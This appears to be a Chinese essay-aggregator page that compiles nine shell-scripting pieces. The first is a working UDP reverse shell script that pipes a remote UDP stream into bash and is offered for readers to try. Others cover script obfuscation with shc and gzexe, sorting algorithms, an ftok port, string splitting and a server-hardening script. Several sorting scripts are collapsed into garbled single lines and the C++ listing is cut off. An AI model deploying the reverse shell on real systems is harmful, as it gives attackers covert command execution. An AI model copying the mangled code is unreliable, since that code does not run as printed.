Linux UDP反弹shell脚本脚本安全

时间:2023-07-02 08:26:18 其他范文 收藏本文 下载本文

Linux UDP反弹shell脚本脚本安全(精选9篇)由网友“Osimyt”投稿提供,下面是小编给大家带来的Linux UDP反弹shell脚本脚本安全,以供大家参考,我们一起来看看吧!

Linux UDP反弹shell脚本脚本安全

篇1:Linux UDP反弹shell脚本脚本安全

无端口

成功启动后无残余文件

一般情况下没有UDP单包512字节的问题,当然你要是执行奇葩的命令我也没办法

非交互式shell,也就是说,你不能用回车来写多行命令。这个问题不是不能解决,而是如果解决这个问题,会造成另外一个我不能忍受的问题。而且反正可以执行命令了,自己另外反弹一个可交互的shell就是了

由于某些bash特性和某些我不能忍受的功能,某些子进程会在链接断开或者输入exit指令一段时间之后才会自动退出

图就不贴了,大家自己玩

#!/bin/bash

exec 3>/dev/udp/127.0.0.1/8080

exec 2>&3

exec 1>&3

echo Welcom back

cat 03 | bash | while read line;do echo $line;done

篇2:shell脚本加密脚本安全

第一种方法(gzexe):

这种加密方式不是非常保险的方法,但是能够满足一般的加密用途,可以隐蔽脚本中的密码等信息,

它是使用系统自带的gzexe程序,它不但加密,同时压缩文件。

使用方法:

gzexe file.sh

它会把原来没有加密的文件备份为 file.sh~ ,同时 file.sh 即被变成加密文件;

第二种方法(shc):

使用 shc 对 Linux shell 脚本加密.

shc是一个专业的加密shell脚本的工具.它的作用是把shell脚本转换为一个可执行的二进制文件,这个办法很好的解决了脚本中含有IP、密码等不希望公开的问题.

shc的下载地址:

点击下载

安装:

tar xzvf shc-3.8.6.tgz

cd shc-3.8.6

mkdir -p /usr/local/man/man1

这步是必须的,不然安装过程中会报错,shc将安装命令到/usr/local/bin/目录下;将帮助文档存放在/usr/local/man/man1/目录下,如果系统中无此目录,安装时会报错,可创建此目录后再执行安装

make install

这是要回答yes或者y,不能直接回车,否则会报错

使用方法:

“-f”选项指定需要加密的程序

shc -r -f script-name

运行后会生成两个文件,script-name.x 和 script-name.x.c. 其中script-name.x是加密后的可执行的二进制文件;用./script-name即可运行,script-name.x.c是生成script-name.x的原文件(c语言).

另shc还提供了一种设定有效执行期限的方法,可以首先使用shc将shell程序转化为二进制,并加上过期时间,如:

# shc -e 18/10/ -m “ It’s too late to run this script. ” -f script.s

篇3:shell脚本学习

1111111111111清除/var/log下messages日志文件的简单命令脚本

/var/log/下日志文件时系统文件,必须有root权限:

$UID是系统的全局变量:

make && make install 表示前面成功了,执行后面的

make || make install 表示前面不成功,执行后面的

清空日志的三种方法:适合保留文件,清空内容的场合

①echo “ ”>test.log或echo >test.log

②>test.log

③cat /dev/null >test.log

22222222222:shell脚本的基础知识

shell是弱类型语言:(语法宽松,不严格)较为通用

通用的shell有标准的Bourne shll(sh)和c shell(csh)其中Bourne shell(sh)已经被bash shell取代

shell脚本的建立:

tac /etc/init.d/nfs 将文件倒着显示

相当于:head -1 /etc/init.d/nfs

①脚本开头

一个规范的shell脚本的第一行会指出由哪个程序(解释器)来执行脚本中的内容,在

333333333333linux bash 编程中一般为:

①解释器

#!/bin/bash

#!/bin/sh

②在linux下sh 相当于bash,

#!又称幻数,在执行bash脚本的时候,内核会根据它来确定用哪个程序来解释脚本中的内容

,这一行必须在脚本顶端的第一行,如果不是第一行,则为注释

Centos.和RedHat linux下默认的shell均为bash

④如果脚本的开头不指定解释器,那么,就要用对应的解释器来执行脚本

脚本注释

#号

444444444444444shell脚本的执行

shell脚本的执行

当shell脚本以非交互的方式运行时,它会先查找环境变量ENV,该变量指定了一个,环境文件(通常是.bashrc),然后从改环境变量文件开始执行,当读取了ENV文件后,SHELL才开始执行shell脚本中的内容,

shell脚本学习

Shell脚本的执行通常可以采用以下三种方式:

①bash script-name或 sh script-name(推荐使用)

②path/script-name或./script-name(当前路径下执行脚本)

③source script-name或. script-name# 注意点号

第一种方法是当脚本文件本身没有可执行权限(即文件X位为-号)时常使用的方法,这里推荐用bash执行,或者文件开头没有指定解释器,

第二种方法需要先将脚本文件的权限改为可执行(即文件加X位),具体方法:chmod u+x

script-name 或者chmod 755 script-name然后通过脚本路径,就可以直接执行脚本了

第三种方法通常是使用source或者“.” 号读入或加载指定的shell脚本文件语句,,然后,依次执行指定shell脚本文件san.sh中的所有。语句将作为当前父shell脚本father.sh进程的一部分运行,因此,使用source或者“.”点号等的可以将san.sh自身脚本中的变量的值,或者函数等的返回值传递到当前的父shell脚本father.sh中使用,这是第三种方法和前两种方法的最大区别

通过source 或“.” 点号加载执行过的脚本,在脚本结束后脚本中的变量(包括函数)值,在当前shell中依然存在,而sh和bash则不行,因此,在做shell脚本开发时。如果脚本中有需求引用其他脚本的内容,或者配置文件时,做好用“.” 点号或者source在脚本开头加载改脚本或配置文件,然后在下面的内容用可以调用source加载的脚本及文件中的变量及函数等内容。

笔试题:

已知如下命令及返回结果,请问echo $user的返回的结果为

[oldboy@test~]cat test.sh

[oldboy@test~]user=`whoami`

[oldboy@test~]sh test.sh

篇4:shell脚本排序(冒泡排序)

#/bin/basha=(9 84 51 0 345 1 2 34 1 0) #自己定义一个数组temp=for((i=0;i<10;i++)){ for((j=i;j<10;j++)) { x=${a[$i]} if test $x -ge ${a[$j]} then temp=${a[$i]} a[$i]=${a[$j]} a[$j]=$temp fi }}for((k=0;k<10;k++)){ echo -n ${a[$k]} “ ”}echo

上面以自定义固定数组进行排序,下面是用户自定义输入数组进行排序,

shell脚本排序(冒泡排序)

#/bin/basha=`expr $# + 1`#expr是一个计算操作,$#是参数个数,$#+1是因为$0没有存储参数.temp=for((i=1;i<$a;i++)){ b[$i]=$1 shift 1 }for((i=1;i<$a;i++)){ for((j=i;j<$a;j++)) { x=${b[$i]} if test $x -ge ${b[$j]} then temp=${b[$i]} b[i]=${b[$j]} b[j]=$temp #相当与冒泡排序 fi }}for((k=1;k<$a;k++)){ echo -n ${b[$k]} “ ” #不换行显示}echo~$./a.out 7 6 56 4 3

~$3 4 6 7 56

篇5:Shell脚本排序算法(冒泡排序)

#/bin/basha=(9 84 51 0 345 1 2 34 1 0) #自己定义一个数组temp=for((i=0;i<10;i++)){ for((j=i;j<10;j++)) { x=${a[$i]} if test $x -ge ${a[$j]} then temp=${a[$i]} a[$i]=${a[$j]} a[$j]=$temp fi }}for((k=0;k<10;k++)){ echo -n ${a[$k]} “ ”}echo

上面写的数组是事前在代码里定义好的数组排序,下面的是用户在执行过程中自定义的数组排序,

Shell脚本排序算法(冒泡排序)

#/bin/basha=`expr $# + 1`#expr是一个计算操作,$#是参数个数,$#+1是因为$0没有存储参数.temp=for((i=1;i<$a;i++)){ b[$i]=$1 shift 1 }for((i=1;i<$a;i++)){ for((j=i;j<$a;j++)) { x=${b[$i]} if test $x -ge ${b[$j]} then temp=${b[$i]} b[i]=${b[$j]} b[j]=$temp #相当与冒泡排序 fi }}for((k=1;k<$a;k++)){ echo -n ${b[$k]} “ ” #不换行显示}echo$: ./liu.sh 8 7 6 4 100 7

$: 4 6 7 7 8 100

篇6:Shell脚本实现ftok函数

这篇文章主要介绍了Shell脚本实现ftok函数,ftok函数是操作系统底层中很有名的一个函数,本文讲在Shell中如何实现同样算法的函数,需要的朋友可以参考下

“古老的 Sys IPC 仍然有好几种有效的用途,三种 IPC 对象是共享内存,信号灯和消息。”当使用到 IPC 的这些对象时,你需要为每个对象创建一个 Key。虽然理论上来说我们在定义一个 IPC Key 的时候可以使用任意自己喜欢的 Key ,但为了避免与其他的程序产生定义重复,在 UNIX/Linux 中一般会使用 key_t ftok(const char *path, int id) 函数来生成一个比较唯一的 Key 值。然而,“每个人都讨厌 System V IPC。它比打孔纸带还慢,使用与文件系统完全无关少得可怜的名字空间,使用人类讨厌的数字给它的对象命名,并且还常常自己忘记自己的对象,你的系统管理员经常需要用 ipcs(1) 查找那些丢失了的对象并且用 ipcrm(1) 删除它们,还得求老天保佑不要在用光内存以后才发现问题。” 对于来实现进程监控/自动重启Bash Shell 脚本来说,在脚本里面硬编码进当前程序用到的 Key 值肯定不是个好办法,最好是实现相同算法的 ftok 函数。

代码如下:

#!/bin/sh

let key=0

function ftok {

pathname=$1;

proj_id=$2;

str_st_ino=`stat --format=‘%i‘ “${pathname}” 2>/dev/null`;

str_st_dev=`stat --format=‘%d‘ “${pathname}” 2>/dev/null`;

if [ “x${str_st_ino}” = “x” -o “x${str_st_dev}” = “x” ] ; then

return 1;

fi

let st_ino=${str_st_ino}

let st_dev=${str_st_dev}

# 注意这里的位操作运算符需要加转义符

let key1=${st_ino}\&16#FFFF

let key2=${st_dev}\&16#FF

let key2=${key2}\<\<16

let key3=${proj_id}\&16#FF

let key3=${key3}\<\<24

let key=${key1}\|${key2}

let key=${key}\|${key3}

}

function echohelp(){

echo “ftok generator”

echo “Usage:ftok pathname projid”

exit 5

}

if [ $# -ne 2 ] ; then

echohelp

fi

sPathName=$1

let nProjectID=$2

if [ “${sPathName:0:1}” != “/” ] ; then

sPathName=${PWD}/${sPathName}

fi

if ! test -f ${sPathName} ; then

echo “No File Found![${sPathName}]”

exit 4

fi

ftok “${sPathName}” “${nProjectID}”

echo ${key}

篇7:Shell脚本实现简单分割字符串

这篇文章主要介绍了Shell脚本实现简单分割字符串,本文讲解使用CUT命令实现以逗号、分号或其它分隔符来切割字符串,需要的朋友可以参考下

我们有这样一个字符串:

代码如下:

info=‘abcd;efgh‘

现在想获取abcd和efgh,我们可以简单地用cut工具来获取:

代码如下:

fstr=`echo $info | cut -d \; -f 1`

sstr=`echo $info | cut -d \; -f 2`

这里主要是用了cut工具的-d和-f参数:

-d:指定字段的分隔符,默认的字段分隔符为“TAB”;

-f:显示指定字段的内容;

关于cut工具其他参数可参考这里:cut命令

篇8:shell脚本编程(快速排序)

#!/bin/bash#shell脚本编程之快速排序的实现(以最右边为元点的思想)a=(8 5 10 3 2 93 4 1 2 3 40 9 61 8 6 29)#a=(0 0 0 0 1 2 3 3 4 4 8 28 30495 921 43716)temp=buff=#交换函数swap{ buff=${a[$1]} a[$1]=${a[$2]} a[$2]=$buff}fun(){ i=$(($1-1)) j=$1 temp=${a[$2]} if test $1 -ge $2 ;then return 2 fi while [ $j -le $2 ];do [ $j -lt $2 ] && while [[ ${a[$j]} -gt $temp ]] ;do j=$(($j+1)) done i=$(($i+1)) swap $i $j j=$(($j+1)) done fun 0 $(($i-1)) fun $(($i+2)) $2}fun 0 15for((i=0;i<16;i++)){ echo -n ${a[$i]} “ ”}echoexit 0

下面是C++快速排序的对照代码

#includeusing namespace std;void swap(int *a,int *b){ int temp = *a; *a = *b; *b = temp;}void Grial(int a[],int x,int y){ int i=x-1; int j=x; if(x>=y)return; int temp = a[y]; while(j<=y) { while(ja[y]) j++; i++; swap(&a[i],&a[j]); j++; } Grial(a,0,i-1); Grial(a,i+1,y);}int main(){ int a[]={4,3,921,30495,28,43716,3,4,0,0,2,0,0,1,8,5}; Grial(a,0,14); for(int i=0;i<15;i++) { cout<

篇9:Linux服务器安全初始化Shell脚本linux服务器应用

下面的这段Linux系统安全Shell脚本用于Linux系统的安全初始化脚本,可以在服务器系统安装完毕之后立即执行以快速建立起服务器的安全防护,最初的脚本由晓辉撰写,在数次修改之后已经大量应用在某大型媒体网站体系中。修改了一些bug,已经在CentOS 5.5 x86_64下通过,目前在一些没有硬件防火墙的服务器上使用。

使用方法:将其复制,保存为一个shell文件,比如security.sh。将其上传到linux服务器上,执行sh security.sh,就可以使用该脚本了。建议大家在系统初始化后立即执行,然后创建了用户帐号和密码后就不要再改动了,以免影响重要文件的初始md5值。

脚本内容(以下内容为了方便阅读,对注释进行了翻译):

#!/bin/sh

# desc: setup linux system security

# author:coralzd

# powered by www.baidu.org.tw

# version 0.1.2 written by 2011.05.03

#设置账号

passwd -l xfs

passwd -l news

passwd -l nscd

passwd -l dbus

passwd -l vcsa

passwd -l games

passwd -l nobody

passwd -l avahi

passwd -l haldaemon

passwd -l gopher

passwd -l ftp

passwd -l mailnull

passwd -l pcap

passwd -l mail

passwd -l shutdown

passwd -l halt

passwd -l uucp

passwd -l operator

passwd -l sync

passwd -l adm

passwd -l lp

# 用chattr给用户路径更改属性。chattr命令用法参考文末说明[1]

chattr +i /etc/passwd

chattr +i /etc/shadow

chattr +i /etc/group

chattr +i /etc/gshadow

# 设置密码连续输错3次后锁定5分钟 【 Linux公社 www.Linuxidc.com 】

sed -i 's#auth    required   pam_env.so#auth    required   pam_env.so\nauth   required   pam_tally.so onerr=fail deny=3 unlock_time=300\nauth     required  /lib/security/$ISA/pam_tally.so nerr=fail deny=3 unlock_time=300#' /etc/pam.d/system-auth

# 5分钟后自动登出,原因参考文末说明[2]

echo “TMOUT=300” >>/etc/profile

# 历史命令记录数设定为10条

sed -i “s/HISTSIZE=1000/HISTSIZE=10/” /etc/profile

# 让以上针对 /etc/profile 的改动立即生效

source /etc/profile

# 在 /etc/sysctl.conf 中启用 syncookie

echo “net.ipv4.tcp_syncookies=1” >>/etc/sysctl.conf

sysctl -p # exec sysctl.conf enable

# 优化 sshd_config

sed -i “s/#MaxAuthTries 6/MaxAuthTries 6/” /etc/ssh/sshd_config

sed -i “s/#UseDNS yes/UseDNS no/” /etc/ssh/sshd_config

# 限制重要命令的权限

chmod 700 /bin/ping

chmod 700 /usr/bin/finger

chmod 700 /usr/bin/who

chmod 700 /usr/bin/w

chmod 700 /usr/bin/locate

chmod 700 /usr/bin/whereis

chmod 700 /sbin/ifconfig

chmod 700 /usr/bin/pico

chmod 700 /bin/vi

chmod 700 /usr/bin/which

chmod 700 /usr/bin/gcc

chmod 700 /usr/bin/make

chmod 700 /bin/rpm

# 历史安全

chattr +a /root/.bash_history

chattr +i /root/.bash_history

# 给重要命令写 md5

cat >list << “EOF” &&

/bin/ping

/usr/bin/finger

/usr/bin/who

/usr/bin/w

/usr/bin/locate

/usr/bin/whereis

/sbin/ifconfig

/bin/vi

/usr/bin/vim

/usr/bin/which

/usr/bin/gcc

/usr/bin/make

/bin/rpm

EOF

for i in `cat list`

do

if [ ! -x $i ];then

echo “$i not found,no md5sum!”

else

md5sum $i >>/var/log/`hostname`.log

fi

done

rm -f list

知识点[1]:有关chattr命令

chattr命令可以修改文件属性,达到保护文件和目录的作用,

相比改变文件读写、执行权限的chmod命令,chattr命令可以控制更底层的文件属性。该命令十分强大,其中一些功能是由Linux内核版本来支持的,如果Linux内核版本低于2.2,那么许多功能不能实现。同样-D检查压缩文件中的错误的功能,需要2.5.19以上内核才能支持。另外,通过chattr命令修改属性能够提高系统的安全性,但是它并不适合所有的目录。chattr命令不能保护/、/dev、/tmp、/var目录。

此类属性的查看可以通过lsattr命令完成。

chattr命令的用法:chattr [ -RV ] [ -v version ] [ mode ] files...

最关键的是在[mode]部分,,即文件属性部分。[mode]部分是由+-=和[ASacDdIijsTtu]这些字符组合的。

+ :在原有参数设定基础上,追加参数。

- :在原有参数设定基础上,移除参数。

= :更新为指定参数设定。

A:文件或目录的 atime (access time)不可被修改(modified), 可以有效预防例如手提电脑磁盘I/O错误的发生。

S:硬盘I/O同步选项,功能类似sync。

a:即append,设定该参数后,只能向文件中添加数据,而不能删除,多用于服务器日志文 件安全,只有root才能设定这个属性。

c:即compresse,设定文件是否经压缩后再存储。读取时需要经过自动解压操作。

d:即no dump,设定文件不能成为dump程序的备份目标。

i:设定文件不能被删除、改名、设定链接关系,同时不能写入或新增内容。i参数对于文件 系统的安全设置有很大帮助。

j:即journal,设定此参数使得当通过mount参数:data=ordered 或者 data=writeback 挂 载的文件系统,文件在写入时会先被记录(在journal中)。如果filesystem被设定参数为 data=journal,则该参数自动失效。

s:保密性地删除文件或目录,即硬盘空间被全部收回。

u:与s相反,当设定为u时,数据内容其实还存在磁盘中,可以用于undeletion.

各参数选项中常用到的是a和i。a选项强制只可添加不可删除,多用于日志系统的安全设定。而i是更为严格的安全设定,只有superuser (root) 或具有CAP_LINUX_IMMUTABLE处理能力(标识)的进程能够施加该选项。

应用实例:

1、用chattr命令防止系统中某个关键文件被修改

# chattr +i /etc/fstab

然后试一下rm mv rename等命令操作于该文件,都是得到Operation not permitted 的结果

2、让某个文件只能往里面追加内容,不能删除,一些日志文件适用于这种操作

# chattr +a /data1/user_act.log

知识点[2]:为何要设置5分钟后自动登出

由于客户的维护人员常常登陆上去后通过直接关闭TERM端口非法退出telnet,造成系统的pts进程越来越多,一个月下来竟然近百,当进程过多的时候系统就会产生报警。规范操作应该是用exit或者ctrl+D,但是其他人并不这样操作,所以我们定义了echo “TMOUT=300” >>/etc/profile这一项内容,是让服务器自动剔除300秒没有任何动作的客户端。当然了这一项大家可以根据实际需求而决定是否添加。

伪科学:Mysql system函数提权

教你做服务级的木马后门

后门750字作文

linux当mysql以root权限登录时提权网站安全

FTP常用软件servu的安全权限处理WEB安全

脚本范文

Shell编程之正则表达式详解

Shell中的变量使用小结

Discuz XSS得webshell脚本安全

Shell脚本逐行读取文件(不改变格式)

Linux UDP反弹shell脚本脚本安全
《Linux UDP反弹shell脚本脚本安全.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【Linux UDP反弹shell脚本脚本安全(精选9篇)】相关文章:

Shell脚本实现检测进程是否正在运行2023-01-25

爆破字典生成小脚本脚本安全2022-05-06

鸟书shell学习(三)shell脚本程序设计要点总结2023-10-19

关于oracle分区技术初了解2022-12-15

星光贴吧1.3 后台拿SHELL及修复方案漏洞预警2022-05-31

让脚本躲过杀毒软件脚本安全2023-08-31

PHP安全 XSS篇2022-08-02

高级运维工程师的工作职责描述2024-02-12

linux下perl,sed,shell批量替换文件内容linux操作系统2022-10-14

Echo 写入VBS提权2022-07-19

点击下载本文文档